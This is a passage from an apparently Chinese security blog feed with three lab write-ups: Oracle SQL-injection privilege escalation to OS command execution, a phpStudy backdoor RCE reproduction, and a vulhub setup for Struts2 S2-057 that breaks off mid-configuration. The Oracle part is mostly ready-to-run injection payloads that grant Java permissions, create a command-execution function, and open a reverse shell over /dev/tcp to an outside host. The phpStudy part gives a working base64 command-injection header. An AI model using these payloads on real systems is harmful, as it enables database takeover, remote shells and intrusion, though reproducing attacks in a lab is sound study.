<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''&lt;&gt;'''''''', ''''''''execute'''''''');end;'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h4 id="3-创建函数"><a class="header-anchor" href="#3-创建函数">¶</a>(3) 创建函数</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h4 id="4-赋予函数执行权限"><a class="header-anchor" href="#4-赋予函数执行权限">¶</a>(4) 赋予函数执行权限</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h4 id="5-执行"><a class="header-anchor" href="#5-执行">¶</a>(5) 执行</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> sys.LinxRunCMD(<span class="string">'/bin/bash -c /usr/bin/whoami'</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<p><img src="extension_linxruncmd_01.png" alt="extension_linxruncmd_01"></p>
<h2 id="方法2-dbms-xmlquery-newcontext"><a class="header-anchor" href="#方法2-dbms-xmlquery-newcontext">¶</a>方法2. dbms_xmlquery.newcontext()</h2>
<p>此方法成功前提</p>
<blockquote>
<ul>
<li>影响版本：Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE(Fixed in CPU July 2006)</li>
</ul>
</blockquote>
<p>即<strong>方法1</strong> 中DBMS_EXPORT_EXTENSION存在漏洞情况下，否则赋予权限时无法成功</p>
<h4 id="1-创建java包"><a class="header-anchor" href="#1-创建java包">¶</a>(1) 创建java包</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p>通过以下命令可以查看all_objects内部改变：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> all_objects <span class="keyword">where</span> object_name <span class="keyword">like</span> <span class="string">'%LINX%'</span> <span class="keyword">or</span> object_name <span class="keyword">like</span> <span class="string">'%Linx%'</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_all_objects_01.png" alt="newcontext_all_objects_01"></p>
<h4 id="2-赋予当前用户java权限"><a class="header-anchor" href="#2-赋予当前用户java权限">¶</a>(2) 赋予当前用户java权限</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">--当前用户查看</span></span><br><span class="line"><span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> dual</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''YY'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''&lt;&lt;ALL FILES&gt;&gt;'''''''', ''''''''execute'''''''');end;'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p>查看可用的java权限列表，通过以下命令查看赋权情况</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_java_policy <span class="keyword">where</span> grantee_name<span class="operator">=</span><span class="string">'YY'</span>;</span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_java_policy_01.png" alt="newcontext_java_policy_01"></p>
<p>若赋权失败，最后执行命令时会报如下错误<br>
<img src="newcontext_linxruncmd_error_01.png" alt="newcontext_linxruncmd_error_01"></p>
<p>此处很坑，前后折腾，不知道哪里问题，有时可以执行命令，有时不能，网上找了太多赋权命令，不知是哪一条成功，导致我恢复快照不下10次测试问题到底出在哪。</p>
<p>最后找到上述查看赋权情况命令，才找出哪条赋权命令能成功。所以，坑在哪里？</p>
<h5 id="T00ls"><a class="header-anchor" href="#T00ls">¶</a><a href="https://www.t00ls.net/thread-35507-1-1.html">T00ls</a></h5>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''&lt;&lt;ALL FILES&gt;&gt;'''',''''EXECUTE'''');end;''commit;end;'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_java_policy_01_t00ls.png" alt="newcontext_java_policy_01_t00ls"><br>
显而易见，根本没赋权成功<br>
关于上述赋权失败，评论里作者回复使用下述命令</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''grant javauserpriv to YY''commit;end;'</span>) <span class="keyword">from</span> dual;</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''grant javasyspriv to YY''commit;end;'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_java_policy_01_t00ls.png" alt="newcontext_java_policy_01_t00ls"></p>
<p>显然，一样的结果</p>
<h5 id="随风’s-blog"><a class="header-anchor" href="#随风’s-blog">¶</a><a href="https://www.iswin.org/2015/06/13/hack-oracle/">随风’s blog</a></h5>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''&lt;&lt;ALL FILES&gt;&gt;'''''''',''''''''execute'''''''');end;'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_java_policy_02_suifeng.png" alt="newcontext_java_policy_02_suifeng"></p>
<p>可见，两种方式均无果</p>
<h4 id="3-创建函数-v2"><a class="header-anchor" href="#3-创建函数-v2">¶</a>(3) 创建函数</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p>判断是否创建成功</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> OBJECT_ID <span class="keyword">from</span> all_objects <span class="keyword">where</span> object_name <span class="operator">=</span><span class="string">'LINXRUNCMD'</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_object_id_01.png" alt="newcontext_object_id_01"></p>
<p>也可通过查看all_objects内部改变判断</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> all_objects <span class="keyword">where</span> object_name <span class="keyword">like</span> <span class="string">'%LINX%'</span> <span class="keyword">or</span> object_name <span class="keyword">like</span> <span class="string">'%Linx%'</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="newcontext_all_objects_02.png" alt="newcontext_all_objects_02"></p>
<p>若想删除创建的函数，通过以下命令删除</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">drop</span> <span class="keyword">function</span> LinxRunCMD</span><br></pre></td></tr></tbody></table></figure>
<h4 id="4-执行"><a class="header-anchor" href="#4-执行">¶</a>(4) 执行</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> LinxRunCMD(<span class="string">'id'</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<p>恭喜！！！</p>
<p><img src="newcontext_linxruncmd_01.png" alt="newcontext_linxruncmd_01"></p>
<p><img src="newcontext_linxruncmd_02.png" alt="newcontext_linxruncmd_02"></p>
<h2 id="方法3-DBMS-JAVA-TEST-FUNCALL"><a class="header-anchor" href="#方法3-DBMS-JAVA-TEST-FUNCALL">¶</a>方法3. DBMS_JAVA_TEST.FUNCALL()</h2>
<h3 id="使用java-privileges"><a class="header-anchor" href="#使用java-privileges">¶</a>使用java privileges</h3>
<blockquote>
<ul>
<li>影响版本： 10g R2, 11g R1, 11g R2</li>
<li>权限：Java Permissions.</li>
</ul>
</blockquote>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">Select</span> DBMS_JAVA_TEST.FUNCALL(<span class="string">'oracle/aurora/util/Wrapper'</span>,<span class="string">'main'</span>,<span class="string">'/bin/bash'</span>,<span class="string">'-c'</span>,<span class="string">'pwd &gt; /tmp/pwd.txt'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></tbody></table></figure>
<p>执行时报如下错，貌似没赋权？实际上赋权后还是一样的错误</p>
<p><img src="test.funcall_error.png" alt="test.funcall_error 2"></p>
<p>但不影响命令的执行</p>
<p><img src="test.funcall_01.png" alt="test.funcall_01"></p>
<p>该方式无回显，在注入时不太方便利用，但可通过此方式反弹 : )</p>
<h1>0x03 反弹shell</h1>
<p>网上铺天盖地windows的payload，linux下根本无法反弹，自己手动测试java代码反弹，然后放入oracle Sql</p>
<p>java反弹代码如下：</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.net.*;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">shellRev</span></span><br><span class="line">{</span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span></span><br><span class="line">        {</span><br><span class="line">                System.out.println(<span class="number">1</span>);</span><br><span class="line">                <span class="keyword">try</span>{run();}</span><br><span class="line">                <span class="keyword">catch</span>(Exception e){}</span><br><span class="line">        }</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">run</span><span class="params">()</span> <span class="keyword">throws</span> Exception</span><br><span class="line">        {</span><br><span class="line">                String[] aaa={<span class="string">"/bin/bash"</span>,<span class="string">"-c"</span>,<span class="string">"exec 9&lt;&gt; /dev/tcp/192.168.1.50/8080;exec 0&lt;&amp;9;exec 1&gt;&amp;9 2&gt;&amp;1;/bin/sh"</span>};</span><br><span class="line">                Process p=Runtime.getRuntime().exec(aaa);</span><br><span class="line">	}</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#编译</span></span><br><span class="line">javac shellRev.java</span><br><span class="line"><span class="comment">#执行</span></span><br><span class="line">java shellRev</span><br></pre></td></tr></tbody></table></figure>
<h2 id="1-创建java代码"><a class="header-anchor" href="#1-创建java代码">¶</a>1. 创建java代码</h2>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell {public static void run() throws Exception{String[] aaa={"/bin/bash","-c","exec 9&lt;&gt; /dev/tcp/127.0.0.1/8080;exec 0&lt;&amp;9;exec 1&gt;&amp;9 2&gt;&amp;1;/bin/sh"};Process p=Runtime.getRuntime().exec(aaa);}}'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h2 id="2-赋予java权限"><a class="header-anchor" href="#2-赋予java权限">¶</a>2. 赋予java权限</h2>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''&lt;&gt;'''''''', ''''''''*'''''''' );end;'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h2 id="3-创建函数-v3"><a class="header-anchor" href="#3-创建函数-v3">¶</a>3. 创建函数</h2>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h2 id="4-赋予函数执行权限-v2"><a class="header-anchor" href="#4-赋予函数执行权限-v2">¶</a>4. 赋予函数执行权限</h2>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h2 id="5-反弹shell"><a class="header-anchor" href="#5-反弹shell">¶</a>5. 反弹shell</h2>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> sys.reversetcp <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<p><img src="reverse.png" alt="reverse"></p>
<h1>0x04 参考链接</h1>
<blockquote>
<p><a href="http://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf">Hacking Oracle from the Web</a><br>
<a href="http://www.usmacd.com/2017/10/11/oracle_run_os_cmd/">Execute os command in Oracle Database</a><br>
<a href="https://www.iswin.org/2015/06/13/hack-oracle/">Oracle Sql注入利用方法</a><br>
<a href="https://www.t00ls.net/thread-35507-1-1.html">对ＸＸ站手工oracle注入到系统shell</a></p>
</blockquote>
]]></content>
      <tags>
        <tag>注入</tag>
      </tags>
  </entry>
  <entry>
    <title>Phpstudy - RCE 复现</title>
    <url>/2019/10/12/Phpstudy-RCE-%E5%A4%8D%E7%8E%B0/</url>
    <content><![CDATA[<h2 id="check"><a class="header-anchor" href="#check">¶</a>check</h2>
<p>9月26号就写好了，一下子就到这个时候了，严重拖延症</p>
<p>先用公开的脚本check一下自己机器上常用的，<a href="https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw">phpstudy后门文件分析以及检测脚本</a></p>
<img src="/2019/10/12/Phpstudy-RCE-%E5%A4%8D%E7%8E%B0/check.jpg" class="">
<p>呵呵，中招，一直在使用<code>phpstudy2016</code>版，上图是2018测试的（我的2016一样中招，被我修复了，没截图），也就是说做肉鸡三年了(微笑)，不过好在我只在用的时候开启<code>apache</code>。</p>
<div class="note info"><p>阅读本篇文章能了解到：<span class="label success">phpstudy</span>, <span class="label success">RCE</span></p></div>
<span id="more"></span>
<p>首发的文章说，官网下的并不会出问题，我使用的一直是官网的，上图也是2018版官网下的，一样中招，也就是phpstudy早在2016年甚至更早就被黑了。</p>
<p><img src="phpstudy2018.jpg" alt="check"></p>
<h2 id="复现"><a class="header-anchor" href="#复现">¶</a>复现</h2>
<figure class="highlight html"><table><tbody><tr><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: 192.168.2.51</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0</span><br><span class="line">Accept-Encoding: gzip,deflate</span><br><span class="line">Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7</span><br></pre></td></tr></tbody></table></figure>
<p><img src="rce.png" alt="rce"></p>
<p>呵呵，真好用！真香！</p>
<p>只需要更改<code>ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7</code>，<code>base64</code>编码的命令而已</p>
<h2 id="坑点"><a class="header-anchor" href="#坑点">¶</a>坑点</h2>
<p><code>Accept-Encoding: gzip,deflate</code><br>
注意：<code>gzip,deflate</code> 必须是此格式，中间只能有逗号，不能有空格</p>
<p>搞得我又测了好久，因为<code>fiddler</code>抓包是这样的格式<code>gzip, deflate</code>，这样会导致<code>rce</code>失败</p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<p><a href="https://www.t00ls.net/viewthread.php?tid=52922">https://www.t00ls.net/viewthread.php?tid=52922</a><br>
<a href="https://www.t00ls.net/viewthread.php?tid=52966">https://www.t00ls.net/viewthread.php?tid=52966</a></p>
]]></content>
      <tags>
        <tag>复现</tag>
        <tag>RCE</tag>
      </tags>
  </entry>
  <entry>
    <title>Struts2 - S2-057复现 (CVE-2018-11776)</title>
    <url>/2018/08/29/Struts2-S2-057%E5%A4%8D%E7%8E%B0-CVE-2018-11776/</url>
    <content><![CDATA[<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>Struts2又出漏洞了，上一波的045好用到不行，复现参考<a href="https://github.com/jas502n/St2-057">https://github.com/jas502n/St2-057</a></p>
<p>写这篇文章时，vulhub还没有057的漏洞环境</p>
<blockquote>
<p>当Struts2的配置满足以下条件时：</p>
<ul>
<li>alwaysSelectFullNamespace值为true</li>
<li>action元素未设置namespace属性，或使用了通配符</li>
</ul>
<p>namespace将由用户从uri传入，并作为OGNL表达式计算，最终造成任意命令执行漏洞。</p>
</blockquote>
<p>影响版本: 小于等于 Struts 2.3.34 与 Struts 2.5.16</p>
<p>看这个条件就知道没那么好利用</p>
<div class="note info"><p>阅读本篇文章能了解到：<span class="label success">vulhub</span>, <span class="label success">docker</span></p></div>
<span id="more"></span>
<h2 id="0x01-vulhub安装"><a class="header-anchor" href="#0x01-vulhub安装">¶</a>0x01 vulhub安装</h2>
<p>踩坑： <a href="https://github.com/vulhub/vulhub/">https://github.com/vulhub/vulhub/</a></p>
<p><code>CentOS 7</code> 安装各种不成功，别小看<code>Installation</code>简简单单4条命令，折腾了一天时间，从<code>CentOS</code> 到<code>ubuntu16.04</code></p>
<p>总结一下坑点（非root下安装）</p>
<h3 id="安装pip"><a class="header-anchor" href="#安装pip">¶</a>安装pip</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">curl -s https://bootstrap.pypa.io/get-pip.py | python3</span><br></pre></td></tr></tbody></table></figure>
<p>直接使用安装命令一直 提示 --user错误，尝试<code>sudo</code>、<code>python3 后加--user</code>、还是不行，各种尝试，不行</p>
<p><img src="error-getPip.png" alt="error-getPip"></p>
<p>解决方案：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">wget https://bootstrap.pypa.io/get-pip.py</span><br><span class="line">python3 get-pip.py --user</span><br></pre></td></tr></tbody></table></figure>
<h3 id="安装最新版docker"><a class="header-anchor" href="#安装最新版docker">¶</a>安装最新版docker</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">curl -s https://get.docker.com/ | sh</span><br></pre></td></tr></tbody></table></figure>
<p>简单一条命令安装，怎么都不行，就是安装不上，还无报错提示，<code>-s</code> 安静模式去掉，看到访问超时，估计又被q了<br>
<img src="error-getDocker.png" alt="error-getDocker"></p>
<p>安装proxychains+shadowsocks<br>
<a href="https://blog.csdn.net/szsteel1/article/details/54773544">Ubuntu 16.04 LTS shadowsocks+proxychains 安装及设置</a></p>
<p>解决方案：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">proxychains wget https://get.docker.com</span><br><span class="line"><span class="built_in">mv</span> index.html getdocker.sh</span><br><span class="line">sudo proxychains ./getdocker.sh</span><br><span class="line"></span><br><span class="line">toor@toor-virtual-machine:~$ docker -v</span><br><span class="line">Docker version 18.06.1-ce, build e68fc7a</span><br></pre></td></tr></tbody></table></figure>
<p>行了，两条命令终于搞定了，以为万事大吉，其实踩坑才刚刚开始</p>
<h3 id="启动docker服务"><a class="header-anchor" href="#启动docker服务">¶</a>启动docker服务</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">sudo service docker start</span><br></pre></td></tr></tbody></table></figure>
<p><img src="error-compose.png" alt="error-compose"><br>
你懂得，不会那么顺利，继续报错，网上各种解决方法 <a href="http://blog.51cto.com/skytina/2044757">Couldn’t connect to Docker daemon at http+unix://</a> 都试了一遍还是没法启动</p>
<p>怎么办，有点抓狂了，折腾一下午了</p>
<p>仔细看<code>README.md</code>中<code>Notice</code></p>
<blockquote>
<p>为防止出现权限错误，最好使用root用户执行docker和docker-compose命令</p>
</blockquote>
<p>尝试<code>sudo</code> 再来一遍，一样无法启动</p>
<p>重头开始，</p>
<div class="note success"><p>`sudo su`进入`root`，以`root`权限重新来过</p></div>
纳尼？启动正常了，行吧，花一天时间只为踩坑
<h3 id="安装compose"><a class="header-anchor" href="#安装compose">¶</a>安装compose</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">pip install docker-compose</span><br></pre></td></tr></tbody></table></figure>
<h3 id="安装git"><a class="header-anchor" href="#安装git">¶</a>安装git</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">apt install git</span><br></pre></td></tr></tbody></table></figure>
<h3 id="拉取项目"><a class="header-anchor" href="#拉取项目">¶</a>拉取项目</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/vulhub/vulhub.git</span><br></pre></td></tr></tbody></table></figure>
<h2 id="0x02-复现"><a class="header-anchor" href="#0x02-复现">¶</a>0x02 复现</h2>
<h3 id="启动环境"><a class="header-anchor" href="#启动环境">¶</a>启动环境</h3>
<p>struts不用编译，直接启动</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">cd</span> vulhub/struts2/s2-048</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></tbody></table></figure>
<h3 id="搭建s2-057漏洞环境"><a class="header-anchor" href="#搭建s2-057漏洞环境">¶</a>搭建s2-057漏洞环境</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># 查看容器id</span></span><br><span class="line">docker ps -a</span><br><span class="line"></span><br><span class="line"><span class="comment"># 在容器cf341620ead4中开启一个交互模式的终端</span></span><br><span class="line">docker <span class="built_in">exec</span> -i -t cf341620ead4 /bin/bash</span><br></pre></td></tr></tbody></table></figure>
<p><img src="dockerPs.png" alt="dockerPs"></p>
<figure class="highlight plaintext"><figcaption><span>笔记</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line">docker exec :在运行的容器中执行命令</span><br><span class="line">    -d :分离模式: 在后台运行</span><br><span class="line">    -i :即使没有附加也保持STDIN 打开</span><br><span class="line">    -t :分配一个伪终端</span><br></pre></td></tr></tbody></table></figure>
<p>Struts 2.5.16存在s2-057漏洞，下载Struts 2.5.16</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> /usr/local/tomcat/webapps/test</span><br><span class="line"><span class="built_in">cd</span> /usr/local/tomcat/webapps/test</span><br><span class="line">wget https://fossies.org/linux/www/legacy/struts-2.5.16-all.zip</span><br><span class="line">apt-get install unzip -y</span><br><span class="line"><span class="built_in">cp</span> struts-2.5.16/apps/struts2-showcase.war /usr/local/tomcat/webapps/</span><br></pre></td></tr></tbody></table></figure>
<h3 id="修改配置文件"><a class="header-anchor" href="#修改配置文件">¶</a>修改配置文件</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">locate struts-actionchaining.xml</span><br></pre></td></tr></tbody></table></figure>
<p>实际上locate命令在此docker容器中不存在，改用find查找</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">toor@toor-virtual-machine:~$ find / -name struts-actionchaining.xml</span><br><span class="line">/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/classes/struts-actionchaining.xml</span><br><span class="line">/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/src/java/struts-actionchaining.xml</span><br><span class="line">..</span><br><span class="line">..</span><br></pre></td></tr></tbody></table></figure>
<p>修改这个两个文件</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">vim /usr/local/tomcat/webapps/struts2-showcase/WEB-INF/classes/struts-actionchaining.xml</span><br><span class="line">bash: vim: <span class="built_in">command</span> not found</span><br><span class="line">apt install vim</span><br></pre></td></tr></tbody></table></figure>
<p><img src="error-vim.png" alt="error-vim"></p>
<p>经查，需要先同步源索引，再安装</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">apt-get update</span><br><span class="line">apt install vim</span><br></pre></td></tr></tbody></table></figure>
<p><code>&lt;struts&gt;&lt;/struts&gt;</code>整个标签替换为</p>
